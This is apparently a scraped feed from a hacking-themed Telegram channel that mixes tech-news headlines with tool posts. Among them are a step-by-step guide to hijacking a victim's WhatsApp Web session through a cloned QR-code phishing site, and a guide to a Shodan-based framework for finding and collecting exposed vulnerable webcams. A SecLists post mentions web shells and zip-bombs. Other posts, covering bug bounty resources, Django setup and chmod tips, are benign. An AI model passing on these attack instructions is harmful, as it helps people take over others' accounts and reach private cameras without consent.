UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.8K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS
Loongson.NET launches open source sharing officially and expands with developers.
#Updates
Forwarded from UNDERCODE NEWS
Breakthrough technologies for batteries! It is said that in 2024, Apple will start producing
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

Hack whatsapp web via a cloned website:

1) git clone https://github.com/raptored01/whatsapp_hack.git
install the requirements

2) cd path/to/the/repo

3) pip install -r requirements.txt

4) first run the grabber

5) python3 grabber.py

6) then run the server

python3 server.py

7) as the victim scans the qr on the fake website, whatsapp web on the browser spawned by the grabber will be connected to the victim's number.

8) change the last line of the server.py script to fit your needs (if run on port 80, you might need to run as superuser)

9) router configuration might be necessary (port mapping)

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Google defends allegations of anti-monopoly: it did not compel anyone to search on Google, and there was no monopoly.
#International
Forwarded from UNDERCODE NEWS
Eldorado and M.video switched to Russian Java.
#Updates
FREE BUG BOUNTY :

Basics
Setup
Tools
Labs & Testing Environments
Vulnerability Types
Mobile Hacking
Smart Contracts
Coding & Scripting
Hardware & IoT
Blog posts & Talks
Media Resources
Certifications
Mindset & Mental Health

> Download:
https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Microsoft declared war on the Israeli surveillance firm NSO Group.
#Malwares
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip

2) git clone --depth 1 https://github.com/danielmiessler/SecLists.git

for kali :

apt -y install seclists

F E A T U R E S :

Fuzzing
dos2unix
IOCs
Miscellaneous
Add Invisible control characters
Passwords
Pattern-Matching
Update Angular dangerous functions
Payloads
Add more zip-bombs
Web-Shells
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
OnePlus is speculated to announce the architecture and configuration of OnePlus Nord SE with big upgrades.
#Technologies
Forwarded from UNDERCODE NEWS
TCL Technology: No investigation notice from any relevant government department .
#International
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

for termux djangohunter - Tool designed to help identify incorrectly configured Django applications that are exposing sensitive information..->

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

pkg update && pkg upgrade
You can use the apt command if your prefer.

apt update && apt upgrade
Tip: Enlarge the font size by pressing CTRL+Alt++

Setup External Storage
Create a storage directory to access other areas of the device.

termux-setup-storage
Install Python
Install Python

pkg install python
Install Git
Install Git

pkg install git
Project Setup
Local Directory
Change directories to the newly created storage folder.

cd storage
Create a directory to store our project files.

mkdir myapp && cd myapp
Virtual Environment
Now that we are in our newly created project folder it's time to setup a virtual environment for our app.

Create Virtual Environment
python -m venv <virtual environment name>
Example:

python -m venv venv
Activate Virtual Environmemt
What good is a virtual environment if it's not being used? That's right, we need to activate it to use it.

source <venv>/bin/activate
Example:

source venv/bin/activate
Tip: Close out of a virtual environment by typing deactivate and then hitting Enter

Install Django
Our virtual environment is activated and we're ready to install Django.

pip install django
Save installed packages to a text file

pip freeze > requirements.txt
Django Setup
Start Project
Tell Django admin to start a new project with your project name.

django-admin startproject <project name>
Example:

django-admin startproject myapp
Change into the Django project directory to view the files Django generated

cd <project name>
Example:

cd myapp
Start App
Tell Django to run a local server and watch for changes

python manage.py runserver
Open your web browser and navigate to localhost:8000 to confirm the Django app is running successfully!

Tip: Stop the local server from running by hitting CTRL+c

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Apple special interview: Technology is the most effective as it empowers everyone.
#Technologies
Forwarded from UNDERCODE NEWS
What kind of PC setup will seamlessly play the light chase game?
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

Blind Attacking Framework :

F E A T U R E S :

> because blind attacking makes every vulnerable & exposed host to the internet a targeted one , hence increases the awareness of potential threats

> because the best way to prevent knowlege abuse under the hood is sharing it with everyone

> because it will always add new to the community and will never be a replica

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) fire up a terminal and sudo apt-get update && apt-get upgrade && apt-get dist-upgrade

2) install [ requests , httplib , urllib , time , bs4 "BeautifulSoup" , colored , selenium , sys ] python modules

3) python BAF_0.1.0.py

4) use BAF authentication to atomatically authenticate with shodan via premium account to get access to all search results or enter your shodan's account username and pass for custom account login

5) choose 1 , let it do it's job , press y , close the previous tab , press y ,close the previous tabs ...etc till u have the vulnerable cams only

6) choose 2 , enter what do u want to search for (ie: NSA) , when it's done , refer to the targets text file , it will contain the targets ip:port
that's all

7) DON'T close a loading webpage
beta versions will make automated browser open for better understanding ,but you can close the webcam tabs freely

TESTED ON:

Ubuntu
Termux
Kali

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Apple lends security experts the β€œspecial edition” iPhone: it’s easier to find glitches.
#Technologies
Forwarded from UNDERCODE NEWS
Why not use a camera that massively improves the camera capability of the iPhone for device photography?
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to set rights to allWEB directories 755 and all files 644:

Let's take a look at this with examples.

1) Recursive change of rights
Change the directory with the cd command to your desired location where you need to assign permissions for all directories to 755 and all files to 644.

cd /home/user/public_html

2) Then use the first chmod 755 command for all directories and subdirectories.

3) The second command will change the permissions for all files to 0644 (chmod 644) in the directory tree.

find . -type d -exec chmod 0755 {} \;
find . -type f -exec chmod 0644 {} \;

4) You can also change the resolution using the xargs command to make it faster:

find . -type d -print0 | xargs -0 chmod 755
find . -type f -print0 | xargs -0 chmod 644

5) The permissions for directory 0755 are similar to "rwxr-xr-x", and the permissions for file 644 are "rw-r - r–".

6) How to change permissions for specific files
Instead of changing the permissions for all files, you can also target specific files with similar extensions.

For example, you have a PHP application installed on your server.

And you don't want to let others run php files.

7) Use the following command to chmod 0640 for all php files:

find . -type f -name "*.php" -exec chmod 0640 {} \;

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁